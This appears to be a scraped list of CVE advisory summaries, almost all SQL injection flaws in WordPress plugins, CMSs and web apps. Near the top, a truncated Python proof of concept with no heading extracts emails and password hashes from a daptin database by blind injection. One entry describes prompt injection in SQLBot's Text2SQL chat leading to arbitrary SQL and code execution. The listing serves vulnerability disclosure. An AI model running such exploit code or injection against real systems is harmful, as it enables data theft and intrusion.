SQL Injection

Unauthenticated SQL injection in BetterDocs Pro for WordPress allows remote attackers to extract sensitive database contents when the Encyclopedia feature is enabled. The vulnerability affects all versions up to 3.7.0 through unsanitized 'limit' parameters in two AJAX endpoints. With CVSS 7.5 (High severity) and network-based unauthenticated attack vector, this presents significant risk to sites using the Encyclopedia feature, though no active exploitation (KEV) or public POC has been identified at time of analysis. EPSS data not available for risk calibration.

ChestnutCMS v1.5.10 has a SQL injection vulnerability. The content parameter of the cms_content tag can be manipulated in the admin backend and injected into a SQL query when the template is rendered.

{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQL injection in Flight PHP framework's SimplePdo database helpers allows privilege escalation through crafted array keys. Applications forwarding user-controlled request data shapes to insert(), update(), or delete() methods enable remote authenticated attackers to inject arbitrary SQL, create administrative accounts, modify sensitive columns, or exfiltrate data. Vendor-released patch in version 3.18.1 validates identifiers with safe-identifier regex. Publicly available proof-of-concept demonstrates privilege escalation via malicious JSON request keys. Researcher @Rootingg discovered and reported through GitHub Security Advisory GHSA-xwqr-rcqg-22mr.

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

SQL injection in Gravity Bookings Premium for WordPress (≤2.5.9) allows unauthenticated remote attackers to extract sensitive database information including user credentials, customer data, and booking records. The vulnerability requires no authentication (CVSS PR:N) and has low attack complexity, enabling widespread exploitation. Reported by Wordfence security research; no CISA KEV listing or public exploit code identified at time of analysis, but the trivial exploitation requirements (network accessible, no auth, no user interaction) make this a high-priority patching target for WordPress sites using this booking plugin.

Authorization bypass in YAFNET forum software (versions ≤4.0.4) allows any low-privileged authenticated user to execute arbitrary SQL commands against the backend database. The flaw stems from a misplaced ASP.NET Core filter (`PageSecurityCheckAttribute`) that validates admin privileges *after* page handlers execute, enabling attackers to inject SQL via the `/Admin/RunSql` endpoint before the 302 redirect occurs. Publicly available exploit code exists (GitHub advisory GHSA-xhw7-j96h-c3g5) demonstrating time-based blind SQL injection to extract `@@VERSION` and manipulate identity tables. CVSS 8.8 (AV:N/AC:L/PR:L) reflects network-accessible exploitation requiring only a standard forum account-trivially obtained via self-registration on most deployments. Vendor-released patch available in version 4.0.5.

SQL injection in Masa CMS 7.2.x through 7.5.2 allows unauthenticated remote attackers to extract sensitive database contents including administrative credentials and password reset tokens. The JSON API accepts unsanitized altTable parameters that are directly interpolated into SQL FROM clauses, enabling arbitrary subquery injection via feedGateway.cfc in a single HTTP request. CVSS 9.3 (Critical) with network vector, low complexity, and no authentication required. No public exploit or CISA KEV listing identified at time of analysis, but the technical details disclosed in the GitHub Security Advisory provide sufficient information for weaponization.

SQL injection in Masa CMS beanFeed.cfc allows unauthenticated remote attackers to extract sensitive database contents, modify records, delete data, or potentially execute code on the database server. The vulnerability affects multiple release branches (7.2.x through 7.5.x) and stems from unsanitized concatenation of the sortDirection parameter directly into SQL queries. With CVSS 9.3 (critical severity, network-accessible, no authentication required) and no public exploit currently identified, this represents a high-priority patching scenario for internet-facing Masa CMS deployments. Vendor-released patches are available across all affected branches.

SQL injection in Masa CMS 7.5.2 and earlier allows unauthenticated remote attackers to execute arbitrary SQL commands via the sortBy parameter in beanFeed.cfc. The vulnerability enables database compromise including sensitive data exfiltration, record manipulation, and privilege escalation to administrative control. Fixed versions released for all affected branches (7.2.10, 7.3.15, 7.4.10, 7.5.3). CVSS 9.3 reflects network vector with no authentication required and high impact across confidentiality, integrity, and availability. No active exploitation confirmed at time of analysis, though the attack surface is fully exposed to internet-facing instances.

SQL injection in ProFTPD 1.3.9a and earlier allows remote attackers to execute arbitrary SQL commands when the 'UseReverseDNS on' configuration is enabled. The vulnerability exists in mod_wrap2_sql.c where attacker-controlled reverse DNS hostnames are passed unescaped into SQL queries during client access control checks. Exploitation complexity is high due to DNS character restrictions and specific configuration requirements. No active exploitation confirmed (not in CISA KEV), but upstream fix is available via GitHub commit 7666224. EPSS risk data not provided.

Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.

SQL injection in WeePie Cookie Allow plugin for WordPress versions ≤3.4.11 allows remote unauthenticated attackers to extract sensitive database contents via the 'consent' parameter. The vulnerability stems from insufficient SQL query preparation and parameter escaping, enabling attackers to append malicious SQL queries to existing database operations. EPSS data not available; no CISA KEV listing indicates targeted rather than widespread exploitation at time of analysis.

Unauthenticated SQL injection in Form Maker by 10Web plugin allows remote attackers to extract sensitive database contents including user credentials, form submissions, and WordPress configuration data. The vulnerability affects all versions through 1.15.42 and requires no special configuration - any WordPress site running the plugin with default settings is exploitable. CVSS 7.5 (High) reflects network-based unauthenticated access with high confidentiality impact. EPSS data not provided; no CISA KEV listing identified, indicating no confirmed widespread exploitation at time of analysis. Patch available in version 1.15.43 per Trac changeset 3518461.

Blind SQL injection in WebinarIgnition WordPress plugin allows remote unauthenticated attackers to extract sensitive database contents including user credentials and private webinar data. The vulnerability affects all versions through 4.08.253 and requires no special configuration. Patchstack publicly disclosed this vulnerability with database reference, though no active exploitation has been confirmed via CISA KEV at time of analysis. The CVSS 9.3 critical rating reflects network-accessible attack vector with scope change, indicating potential for lateral movement beyond the vulnerable component.

SQL injection in itsourcecode Courier Management System 1.0 via the ids parameter in /print_pdets.php allows authenticated remote attackers to execute arbitrary SQL queries with low impact to confidentiality, integrity, and availability. The vulnerability has a publicly available proof-of-concept and is characterized by low CVSS score (2.1) due to authentication requirement and limited scope, but SQL injection itself represents a persistent threat vector if the system processes sensitive courier data.

Unauthenticated SQL injection in GeekyBot WordPress plugin allows remote attackers to extract sensitive database contents via the 'attributekey' parameter. Affects all versions through 1.2.0. The CVSS 7.5 rating reflects network-based exploitation requiring no authentication or user interaction, with high confidentiality impact. Wordfence Threat Intelligence identified this vulnerability, with a patch committed in changeset 3474168. No active exploitation confirmed in CISA KEV at time of analysis, though the trivial attack complexity (AC:L) and unauthenticated vector (PR:N) make this a realistic target for automated scanning and exploitation.

SQL injection in Oracle MCP Server Helper Tool 1.0.1-1.0.156 allows low-privileged authenticated attackers to execute malicious SQL queries with high confidentiality and integrity impact across security boundaries. The vulnerability requires network access via HTTP and user interaction, affecting the helper tool component. With CVSS 8.7 and easily exploitable characteristics (AC:L), this represents significant risk for organizations running affected versions, though no public exploit or active exploitation (CISA KEV) has been identified at time of analysis. The changed scope (S:C) indicates potential impact beyond the vulnerable component itself.

SQL injection in AWP Classifieds plugin for WordPress versions up to 4.4.5 allows remote unauthenticated attackers to extract sensitive database contents via array key manipulation in the 'regions' parameter. The vulnerability stems from insufficient escaping of user input in search functionality, affecting the plugin's query integration and page search components. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) and no authentication required, this poses significant risk to WordPress sites running this classifieds plugin, though no public exploit or active exploitation has been identified at time of analysis.

SQL injection in Kestra workflow orchestration platform versions 1.3.3 and earlier enables remote unauthenticated attackers to execute arbitrary SQL commands and fully compromise the application database. The vulnerability stems from unsanitized GET parameters directly concatenated into SQL queries, allowing complete data exfiltration, modification, and potential database server compromise. Despite critical CVSS 9.8 severity, EPSS score of 0.01% (2nd percentile) suggests minimal observed exploitation attempts, though GitHub security advisory publication indicates vendor acknowledgment and likely patch availability.

SQL injection in CodeCanyon Perfex CRM up to version 3.4.1 allows authenticated remote attackers to execute arbitrary SQL queries via the Admin Kanban Endpoint's AbstractKanban::applySortQuery function. The vulnerability stems from improper sanitization of the sort query argument and can lead to unauthorized data access, modification, and potential system compromise. Publicly available exploit code exists, increasing real-world risk.

SQL injection in OpenC3 COSMOS 6.7.0 to 7.0.0-rc2 allows authenticated users with minimal 'tlm' (telemetry viewer) privileges to execute arbitrary SQL commands against the QuestDB time-series database. Attackers can exfiltrate all telemetry data, drop tables, or manipulate historical records via the get_tlm_values RPC endpoint by injecting malicious SQL into the start_time parameter. Vendor-released patch available in version 7.0.0-rc3 (commit 9ba60c0). No active exploitation confirmed (not in CISA KEV), but GitHub advisory includes working proof-of-concept payloads demonstrating both data extraction and table deletion.

SQL injection in SourceCodester Web-based Pharmacy Product Management System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in /product_expiry/edit-admin.php, enabling unauthorized data access, modification, and deletion. The vulnerability has a publicly available exploit and CVSS 6.3 base score reflects moderate impact with low attack complexity; however, authentication is required, limiting exposure to users with valid credentials.

SQL injection in CodeAstro Online Classroom 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via a crafted deleteid parameter in the /OnlineClassroom/facultydetails endpoint, enabling data exfiltration and potential database manipulation. The vulnerability has public exploit code available and CVSS 6.3 (medium severity) reflects the requirement for prior authentication and limited scope, though the exploitation probability is rated probable by scoring metadata.

SQL injection in CodeAstro Online Classroom 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the fname parameter in the /OnlineClassroom/addnewstudent endpoint, resulting in unauthorized data access, modification, and denial of service. Public exploit code is available and the vulnerability carries a CVSS score of 6.3 with proof-of-concept code confirmed accessible on GitHub.

SQL injection in CodeAstro Online Classroom 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the deleteid parameter in the /OnlineClassroom/studentdetails endpoint, enabling unauthorized data access, modification, and potential denial of service. The vulnerability has publicly available exploit code and confirmed exploitation potential, affecting all versions up to 1.0.

SQL injection in CodeAstro Online Classroom 1.0 allows authenticated remote attackers to manipulate the fid parameter in the /OnlineClassroom/facultylogin endpoint, leading to unauthorized data access, modification, and denial of service. The vulnerability has a publicly available proof-of-concept exploit and is likely to be actively exploited given the moderate CVSS score (6.3) and confirmed POC availability.

SQL injection in CodeAstro Online Classroom 1.0 allows authenticated remote attackers to manipulate the sid parameter in the /OnlineClassroom/studentlogin endpoint, enabling data exfiltration and modification with low complexity exploitation. Public exploit code is available, increasing real-world risk despite the moderate CVSS score of 6.3.

SQL injection in code-projects BloodBank Managing System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the G_STATE_ID parameter in get_state.php, potentially exfiltrating sensitive patient or blood bank data. The vulnerability has low confidentiality and integrity impact but carries exploitability risk (E:P in CVSS 4.0) and publicly available exploit code, making it a practical concern for deployed instances despite the low CVSS score of 2.1.

SQL injection in Shandong Hoteam PDM Product Data Management System versions ≤8.3.9 allows remote unauthenticated attackers to execute arbitrary SQL commands via the SortOrder parameter in the GetQueryMachineGridOnePageData function of /Base/BaseService.asmx/DataService endpoint. The vulnerability enables unauthorized data access, modification, and potential service disruption (CVSS 7.3: C:L/I:L/A:L). Vendor-released patch available in version 8.3.10. EPSS data not available; no CISA KEV listing or public exploit code identified at time of analysis.

SQL injection in code-projects Gym Management System in PHP allows authenticated remote attackers to manipulate the 'day' parameter in /index.php, enabling arbitrary SQL query execution with limited confidentiality and integrity impact. The vulnerability carries a CVSS score of 2.1 and requires prior authentication (PR:L); publicly available exploit code exists but active exploitation confirmation is absent from CISA KEV data.

SQL injection in Dromara MaxKey up to version 3.5.13 allows authenticated remote attackers to execute arbitrary SQL queries via manipulation of the filtersfields argument in the StrUtils.checkSqlInjection function, potentially leading to unauthorized data access, modification, or deletion. The vulnerability requires low-privilege authentication and has publicly available exploit code; the vendor has not responded to early disclosure notifications.

SQL injection in AMTT Hotel Broadband Operation System 1.0 allows authenticated remote attackers with high privileges to manipulate the ID argument in /manager/card/cardhand_submit.php, potentially extracting or modifying database contents. Publicly available exploit code exists, though the CVSS score of 4.7 reflects the requirement for authenticated administrative access, limiting real-world impact compared to unauthenticated SQL injection vulnerabilities.

SQL injection in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 allows remote unauthenticated attackers to read, modify, or delete database contents via the fCircuitids parameter in /SubstationWEBV2/main/elecMaxMinAvgValue endpoint. Publicly available exploit code exists (VulDB 360864) with low attack complexity (CVSS AC:L), enabling attackers to compromise confidentiality, integrity, and availability of backend data. EPSS data unavailable; not listed in CISA KEV. Vendor was notified but remains unresponsive, suggesting no official patch timeline.

SQL injection in Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System 1.3.0 allows remote unauthenticated attackers to manipulate the fCircuitids parameter in the /SubstationWEBV2/main/elecMaxMinAvgValue endpoint, leading to unauthorized database queries and potential information disclosure. Publicly available exploit code exists and the vulnerability affects a widely used industrial energy management system with no vendor response or patch confirmation.

SQL injection in Dolibarr ERP CRM up to version 23.0.2 allows authenticated remote attackers to execute arbitrary SQL queries via the fields parameter in the Shipments API Endpoint (_checkValForAPI function). Exploitation requires high attack complexity and authenticated access, with publicly available exploit code confirmed but no active exploitation reported in CISA KEV at time of analysis.

SQL injection in YunaiV yudao-cloud up to version 2026.01 allows authenticated remote attackers to execute arbitrary SQL queries via the getDataBySQL function in GoViewDataServiceImpl.java, potentially compromising confidentiality, integrity, and availability of the application database. Publicly available exploit code exists, and the vendor did not respond to early disclosure notifications.

SQL injection in youlai-boot up to version 2.21.1 via argument order manipulation in the getUserList endpoint allows authenticated remote attackers to execute arbitrary SQL queries with limited data access impact. The vulnerability affects the Users Endpoint component, has publicly available exploit code, and the vendor has not responded to disclosure attempts despite early notification.

SQL injection in Jinher OA 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the DeptIDList parameter in UserSel.aspx. The vulnerability permits unauthorized database access with potential for data exfiltration, modification, and limited system compromise. Public exploit code exists on GitHub (zzlln/cvecve), significantly lowering the barrier to exploitation. Vendor did not respond to disclosure, leaving patch status unknown.

SQL injection in code-projects Online Hospital Management System 1.0 allows remote unauthenticated attackers to manipulate the delid parameter in /viewappointment.php, enabling database queries with limited confidentiality and integrity impact. The vulnerability is publicly disclosed with available exploit code and poses a network-accessible risk to unpatched deployments.

Time-based blind SQL injection in Geo Mashup WordPress plugin allows unauthenticated remote attackers to extract database contents when Geo Search is enabled. The vulnerability stems from explicit removal of WordPress's built-in magic quotes protection via stripslashes_deep($_POST), combined with failure to sanitize the map_post_type parameter before SQL concatenation in an IN() clause. EPSS data not provided. No CISA KEV listing indicates this is not yet confirmed as actively exploited. Public exploit code status unknown, though detailed code references in Wordfence advisory provide clear exploitation path. Patch released in changeset 3503627.

Time-based SQL injection in Geo Mashup WordPress plugin versions ≤1.13.18 allows unauthenticated remote attackers to extract sensitive database information. The vulnerability stems from ineffective sanitization in the 'object_ids' and 'exclude_object_ids' parameters-while esc_sql() is applied, it provides no protection in unquoted IN() contexts where attackers can inject parentheses and SQL keywords. The numeric sanitizer exists but only applies to AJAX paths, leaving render-map.php and template tag paths vulnerable. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, but Wordfence Threat Intelligence disclosure increases likelihood of weaponization.

Time-based SQL injection in WordPress Geo Mashup plugin ≤1.13.18 allows unauthenticated remote attackers to extract sensitive database information. The 'sort' parameter in multiple code paths (render-map.php, template tags) lacks proper sanitization despite esc_sql() application, which is ineffective in ORDER BY contexts without quote encapsulation. Version 1.13.18 added allowlist-based sanitization but only protected the AJAX endpoint, leaving other attack vectors exploitable. EPSS and KEV data not available; vulnerability disclosed by Wordfence with public source code references confirming the flaw.

SQL injection in itsourcecode Courier Management System 1.0 allows high-privilege remote attackers to manipulate the ID parameter in /edit_user.php, leading to unauthorized database queries with limited confidentiality and integrity impact. Exploit code has been publicly disclosed, though the CVSS 4.0 score of 2.0 and requirement for high-privilege authentication significantly constrain real-world risk.

SQL injection in Sunnet CTMS allows authenticated remote attackers with low privileges to execute arbitrary SQL commands over the network. The vulnerability enables complete compromise of database integrity - reading sensitive data, modifying records, and deleting information. Taiwan CERT (TWCERT) published advisories documenting this vulnerability, indicating coordinated disclosure. EPSS and KEV data not available; exploitation status unknown beyond vendor notification.

Time-based blind SQL injection in Geo Mashup WordPress plugin versions up to 1.13.19 allows authenticated attackers with subscriber-level access to extract sensitive database information via the 'geo_mashup_null_fields' parameter due to insufficient escaping and lack of prepared statement usage. The vulnerability requires valid WordPress authentication but grants high-confidence data confidentiality compromise without requiring user interaction, affecting all installations of this geolocation plugin with vulnerable versions active.

Time-based blind SQL injection in ARMember WordPress plugin versions up to 4.0.60 allows unauthenticated remote attackers to extract sensitive database information via the 'orderby' parameter. The vulnerability stems from insufficient input sanitization in the members directory and shortcode handling classes, enabling attackers to append malicious SQL queries without authentication (CVSS 7.5, AV:N/AC:L/PR:N/UI:N). EPSS data and active exploitation status not available at time of analysis, but the lack of authentication requirements and low attack complexity make this a high-priority remediation target for WordPress sites using ARMember for membership management or content restriction.

SQL injection in itsourcecode Courier Management System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /edit_staff.php, potentially leading to unauthorized database access and data disclosure. The vulnerability has a CVSS score of 5.5 with a publicly available exploit, indicating moderate real-world risk despite the low confidentiality impact rating.

SQL injection in TimBroddin astro-mcp-server up to version 1.1.1 allows authenticated remote attackers to manipulate MCP Tool Query Construction parameters via crafted request.params.arguments, enabling arbitrary SQL query execution. Public exploit code exists and the vendor has not yet responded to early notification, leaving deployed instances at risk.

SQL injection in itsourcecode Electronic Judging System 1.0 allows remote attackers to manipulate the Username parameter in /intrams/login.php, leading to unauthorized data access and modification. The vulnerability requires no authentication and can be exploited over the network with low complexity. Publicly available exploit code exists, and the CVSS 4.0 vector indicates confidentiality and integrity impact on the affected application.

SQL injection in code-projects Gym Management System 1.0 allows authenticated high-privilege users to manipulate the edit_exercise parameter in /admin/edit_exercises.php, enabling remote database queries with limited confidentiality, integrity, and availability impact. Publicly available exploit code exists; CVSS 4.7 reflects low real-world risk due to high-privilege requirement (PR:H), though the vulnerability remains remotely accessible without user interaction.

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to read, modify, or delete database records via the ID parameter in /ajax.php?action=save_customer. CVSS 7.3 with low attack complexity and no authentication required. Publicly available exploit code exists (GitHub POC published), elevating immediate risk for exposed installations. EPSS data not available, but the combination of network vector, zero authentication, and public POC indicates high probability of opportunistic scanning and exploitation.

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to extract database contents, modify records, or execute unauthorized queries via the ID parameter in /ajax.php?action=delete_customer. Publicly available exploit code exists (GitHub POC), enabling trivial exploitation against exposed instances. CVSS 7.3 reflects network-accessible attack with low complexity and no authentication requirement, though EPSS data unavailable and not currently listed in CISA KEV, suggesting limited widespread exploitation despite POC availability.

SQL injection in SourceCodester Advanced School Management System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL queries via the checkEmail endpoint in commonController.php, potentially exposing or modifying database contents. Publicly available exploit code exists and the vulnerability requires only network access with no authentication, making it a practical exploitation risk for exposed instances.

SQL injection in MixPHP Framework 2.x through 2.2.17 allows unauthenticated remote attackers to read or modify database contents via a crafted data array passed to the data function in BuildHelper.php. The vulnerability has an automatable exploitation path per CISA SSVC but no public exploit code or active KEV listing identified at analysis time. CVSS 6.5 (medium) reflects network-accessible SQL injection with partial confidentiality and integrity impact but no availability impact.

SQL injection in MixPHP Framework versions 2.0 through 2.2.17 allows unauthenticated remote attackers to execute arbitrary SQL queries by supplying crafted array parameters to the joinOn function in BuildHelper.php. The vulnerability has a CVSS score of 6.5 with network-accessible exploitation requiring no authentication or user interaction. SSVC signals indicate exploitation is automatable, though no active exploitation in the wild has been reported at time of analysis.

Authenticated admin users in V2Board through version 1.7.4 can exploit unsanitized sort parameters in the user management interface to disclose sensitive database information including password hashes and authentication tokens through ORDER BY-based information disclosure. The vulnerability requires admin privileges and does not enable data modification or service disruption, but allows attackers with administrative access to extract confidential user data by analyzing sort order patterns.

SQL injection in SourceCodester Hotel Management System 1.0 allows unauthenticated remote attackers to extract, modify, or delete database contents via the room_type parameter in /index.php/reservation/check. CVSS 7.3 indicates medium-to-high severity with confidentiality, integrity, and availability impacts. Publicly available exploit code (GitHub) significantly lowers the barrier to exploitation. EPSS data unavailable, but public POC availability and remote unauthenticated attack vector suggest elevated real-world risk for internet-exposed installations of this PHP-based hotel management system.

Stored cross-site scripting in IBM Langflow Desktop 1.6.0 through 1.8.4 allows authenticated users to inject arbitrary JavaScript code into the Web UI, potentially altering application functionality and disclosing session credentials to other users of the same instance. The vulnerability requires valid authentication but no user interaction from the target, affecting confidentiality and integrity of the application.

SQL injection in SSCMS v7.4.0 enables high-privileged attackers to execute arbitrary SQL statements via the stl:sqlContent tag's queryString attribute. Attackers with administrative access can craft encrypted payloads to the /api/stl/actions/dynamic endpoint, bypassing parameterization controls to achieve database compromise, authentication bypass, or complete data exfiltration. EPSS data not available; no confirmed active exploitation (CISA KEV negative); public exploit code availability unknown but detailed technical advisory published by VulnCheck increases weaponization risk.

SQL injection in SourceCodester Pet Grooming Management Software 1.0 allows authenticated remote attackers to manipulate the type, length, or business parameters in /admin/update_customer.php, enabling unauthorized database queries with limited confidentiality and integrity impact. The vulnerability requires login credentials (PR:L) but carries low overall severity (CVSS 2.1); however, publicly available exploit code exists and the attack vector is network-accessible, making it a practical risk for multi-tenant or shared hosting deployments.

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the pid parameter in /admin/ajax.php?action=add_to_cart, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has publicly available exploit code and may be actively exploited.

SQL injection in n8n's SeaTable node allows remote unauthenticated attackers to bypass row-level access controls and retrieve unintended data from SeaTable databases when workflows accept user-controlled input via expressions in search or row retrieval parameters. The vulnerability affects n8n versions before 1.123.32, 2.17.4, and 2.18.1, and requires specific workflow configuration combining the SeaTable node with external user input passed through expressions. No public exploit code or active exploitation has been confirmed at time of analysis.

SQL injection in n8n Snowflake and legacy MySQL v1 nodes allows authenticated users with workflow creation permissions to execute arbitrary SQL against connected databases by injecting malicious table names, column names, or update keys via expression inputs. This vulnerability affects n8n versions before 1.123.32, 2.17.4, and 2.18.1; successful exploitation enables data exfiltration, modification, or deletion. The flaw represents an incomplete fix to a prior SQL injection vulnerability (GHSA-f3f2-mcxc-pwjx) that already patched MySQL, PostgreSQL, and SQL Server nodes but overlooked the Snowflake node and legacy MySQL v1 implementation.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers with high privileges to manipulate the save_user function in /admin/ajax.php via crafted input, enabling data exfiltration and modification. The vulnerability requires administrative credentials, has publicly available exploit code, and poses moderate risk (CVSS 4.7) primarily to systems where admin accounts are compromised or weak.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege attackers to manipulate the save_menu function via the /admin/ajax.php endpoint, enabling database queries with limited confidentiality and integrity impact. The vulnerability requires administrative credentials and carries a moderate CVSS score of 4.7; publicly available exploit code exists but active exploitation at scale has not been confirmed.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege users to manipulate the save_settings function via the /pizzafy/admin/ajax.php endpoint, enabling database query modification with confidentiality, integrity, and availability impact. The vulnerability requires high-level authentication and is not remotely exploitable by unauthenticated attackers despite network-accessible endpoint; publicly available exploit code exists and the vulnerability has been disclosed.

A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/view_order.php of the component GET Parameter Handler. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This impacts the function delete_supplier of the file /ajax.php?action=delete_supplier. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

A security vulnerability has been detected in EyouCMS up to 1.7.9. The affected element is the function GetSortData of the file application/common.php. The manipulation of the argument sort_asc leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function save_supplier of the file /ajax.php?action=save_supplier. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Steve Burge TaxoPress simple-tags allows Blind SQL Injection.This issue affects TaxoPress: from n/a through <= 3.44.0.

SQL injection (SQLi) in MegaCMS v12.0.0, specifically in the “id_territorio” parameter of the “/web_comunications/cms/get_provincias” endpoint. The vulnerability arises from inadequate validation and sanitisation of user input. Specifically, via a POST request, the “id_territorio” parameter, used immediately after the registration form is submitted, could be manipulated by an unauthenticated attacker to execute arbitrary SQL queries.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the delete_category function (/admin/ajax.php?action=delete_category). The vulnerability requires high-privilege authentication but enables limited confidentiality and integrity impact. Publicly available exploit code exists, elevating real-world risk despite the moderate CVSS score of 5.1.

SQL injection in JeecgBoot up to version 3.9.1 allows authenticated remote attackers to execute arbitrary SQL commands through the loadDict endpoint by manipulating the keyword parameter in the SqlInjectionUtil function. The vulnerability has a CVSS score of 6.3 with network-accessible attack vector, and publicly available exploit code exists; patch availability is confirmed via GitHub commit a9c8e8eb1185751c4c3c68d2a53f3dadee9edc6b.

